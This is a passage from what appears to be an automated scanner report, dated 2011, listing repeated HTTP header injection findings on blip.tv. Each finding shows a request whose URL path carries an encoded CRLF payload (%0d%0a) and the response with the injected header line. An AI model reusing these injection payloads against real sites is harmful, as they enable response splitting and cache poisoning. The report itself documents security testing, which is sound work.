The value of REST URL parameter 2 is copied into the Location response header. The payload 77c44%0d%0a731e5840778 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/77c44%0d%0a731e5840778 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/77c44
731e5840778

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218035
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/77c44
731e5840778">her
...[SNIP]...

2.42. http://blip.tv/file/4416697 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4416697

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 838ca%0d%0af3fd031237e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /838ca%0d%0af3fd031237e/4416697 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/838ca
f3fd031237e
/4416697
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218069
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/838ca
f3fd031237e/4416697">
...[SNIP]...

2.43. http://blip.tv/file/4416697 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4416697

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44d2f%0d%0a2d5d0852c17 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/44d2f%0d%0a2d5d0852c17 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/44d2f
2d5d0852c17

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1498218133
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/44d2f
2d5d0852c17">her
...[SNIP]...

2.44. http://blip.tv/file/4469619 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4469619

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7ba8a%0d%0a36f11fef696 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7ba8a%0d%0a36f11fef696/4469619 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7ba8a
36f11fef696
/4469619
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 2146046709
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7ba8a
36f11fef696/4469619">
...[SNIP]...

2.45. http://blip.tv/file/4469619 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4469619

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d9a18%0d%0a6d93c89ed7b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d9a18%0d%0a6d93c89ed7b HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d9a18
6d93c89ed7b

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1274882937
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d9a18
6d93c89ed7b">her
...[SNIP]...

2.46. http://blip.tv/file/4581305 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4581305

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33faa%0d%0afe8f417e499 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33faa%0d%0afe8f417e499/4581305 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/33faa
fe8f417e499
/4581305
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1498217742
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/33faa
fe8f417e499/4581305">
...[SNIP]...

2.47. http://blip.tv/file/4581305 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4581305

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7e2f5%0d%0a1833df07fdd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/7e2f5%0d%0a1833df07fdd HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/7e2f5
1833df07fdd

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1324528387
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/7e2f5
1833df07fdd">her
...[SNIP]...

2.48. http://blip.tv/file/4584742 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4584742

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f67ac%0d%0a68d36caf2a2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f67ac%0d%0a68d36caf2a2/4584742 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f67ac
68d36caf2a2
/4584742
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 2146046439
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f67ac
68d36caf2a2/4584742">
...[SNIP]...

2.49. http://blip.tv/file/4584742 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4584742

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e960c%0d%0ab5af3a4e13a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e960c%0d%0ab5af3a4e13a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/e960c
b5af3a4e13a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 344227963
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e960c
b5af3a4e13a">her
...[SNIP]...

2.50. http://blip.tv/file/4590551 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4590551

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39bb4%0d%0a4b50fb528ed was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39bb4%0d%0a4b50fb528ed/4590551 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/39bb4
4b50fb528ed
/4590551
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1025267706
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/39bb4
4b50fb528ed/4590551">
...[SNIP]...

2.51. http://blip.tv/file/4590551 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4590551

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload afb39%0d%0a42540f14b1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/afb39%0d%0a42540f14b1e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/afb39
42540f14b1e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:34 GMT
X-Varnish: 1025267752
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/afb39
42540f14b1e">her
...[SNIP]...

2.52. http://blip.tv/file/4627157 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4627157

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c015b%0d%0a5a45b6bf0c7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c015b%0d%0a5a45b6bf0c7/4627157 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/c015b
5a45b6bf0c7
/4627157
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1025267356
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c015b
5a45b6bf0c7/4627157">
...[SNIP]...

2.53. http://blip.tv/file/4627157 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4627157

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eabb0%0d%0ab16f0f647e2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/eabb0%0d%0ab16f0f647e2 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/eabb0
b16f0f647e2

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1498217357
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/eabb0
b16f0f647e2">her
...[SNIP]...

2.54. http://blip.tv/file/4639878 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4639878

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57924%0d%0a766c2b1b358 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57924%0d%0a766c2b1b358/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/57924
766c2b1b358
/4639878?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 364
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 2146042173
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/57924
766c2b1b358/4639878?f
...[SNIP]...

2.55. http://blip.tv/file/4639878 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4639878

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5186e%0d%0a79aa2929b74 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/5186e%0d%0a79aa2929b74?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/5186e
79aa2929b74
?filename=ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 376
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 344223698
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/5186e
79aa2929b74?file
...[SNIP]...

2.56. http://blip.tv/file/4644899 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4644899

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12279%0d%0ae4d4ddbbb2b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12279%0d%0ae4d4ddbbb2b/4644899 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/12279
e4d4ddbbb2b
/4644899
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1248906018
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/12279
e4d4ddbbb2b/4644899">
...[SNIP]...

2.57. http://blip.tv/file/4644899 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4644899

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 903a0%0d%0a91461411a13 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/903a0%0d%0a91461411a13 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/903a0
91461411a13

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:33 GMT
X-Varnish: 1248906077
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/903a0
91461411a13">her
...[SNIP]...

2.58. http://blip.tv/file/4645321 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4645321

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 934d6%0d%0ae4e44b51785 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /934d6%0d%0ae4e44b51785/4645321 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/934d6
e4e44b51785
/4645321
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:30 GMT
X-Varnish: 1498217234
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/934d6
e4e44b51785/4645321">
...[SNIP]...

2.59. http://blip.tv/file/4645321 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4645321

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bef6c%0d%0ac729cead865 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/bef6c%0d%0ac729cead865 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/bef6c
c729cead865

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1025267327
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/bef6c
c729cead865">her
...[SNIP]...

2.60. http://blip.tv/file/4648265 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648265

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9745c%0d%0a520cfc6583a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9745c%0d%0a520cfc6583a/4648265 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/9745c
520cfc6583a
/4648265
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 1248905826
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/9745c
520cfc6583a/4648265">
...[SNIP]...

2.61. http://blip.tv/file/4648265 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648265

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e99ba%0d%0a03b90571645 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e99ba%0d%0a03b90571645 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/e99ba
03b90571645

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:32 GMT
X-Varnish: 1248905867
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e99ba
03b90571645">her
...[SNIP]...

2.62. http://blip.tv/file/4648488 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/4648488

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fd583%0d%0a41c0b66503e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fd583%0d%0a41c0b66503e/4648488 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fd583
41c0b66503e
/4648488
Content-Type: text/html; charset=iso-8859-1
Content-Length: 286
Date: Thu, 20 Jan 2011 00:38:31 GMT
X-Varnish: 2146046122
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fd583
